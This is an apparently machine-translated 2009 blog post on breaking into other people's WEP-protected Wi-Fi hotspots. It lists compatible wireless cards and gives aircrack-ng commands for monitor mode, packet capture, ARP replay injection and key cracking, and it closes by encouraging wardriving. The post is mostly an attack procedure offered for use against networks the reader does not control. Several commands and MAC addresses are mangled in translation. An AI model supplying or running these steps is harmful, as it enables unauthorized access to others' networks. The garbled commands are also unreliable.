Entering Hotspot protected with WEP
Senin, 05 Januari 2009
For that you have a laptop instead of AXIO to the top and equipped Wireless, let us practical beauty "air property" with a little learning. Do not just for typing papers and watching miyabi.
Card best use Atheros. If no, alternative: 3Com 3CRPAG175B, 3Com 3CRXJK10075, DLINK DWL-G630 Rev C, Linksys WPC55AG, TrendNET TEW-441PC, TrendNET TEW-443PI, TP-LINK TL-WN610G
consol
airmon-ng stop ath0 \ ___ wireless monitoring and injection
airmon-start wifi0 ng /
airodump-ng ath0
Consider this example table:
BSSID PWR Beacons Data # H / S CH MB ENC Cipher AUTH ESSID
00:19:5 B: 5C: 62:92 9 57 5 0 6 54 WEP WEP REK-1
00:17:9 A: C0: 50:3 E 7 66 92 0 1 54 OPN Hall_G
etc..
airodump-ng-channel 6-bssid 00:19:5 B: 5C: 62:92-w results ath0 <- collecting data before cracking WEP. note on the table
consol
aireplay-ng-arpreplay-b 00:19:5 B: 5C: 62:92-h 00:19: D2: 45: D0: EB ath0 <- 00:19: D2: 45: D0: EB is the MAC-Address his
aircrack-ng results *. stamp <- time t Crack!
aircrack-ptw results-01.cap <- or this!
Use facilities WarDriving!
0 komentar:
Posting Komentar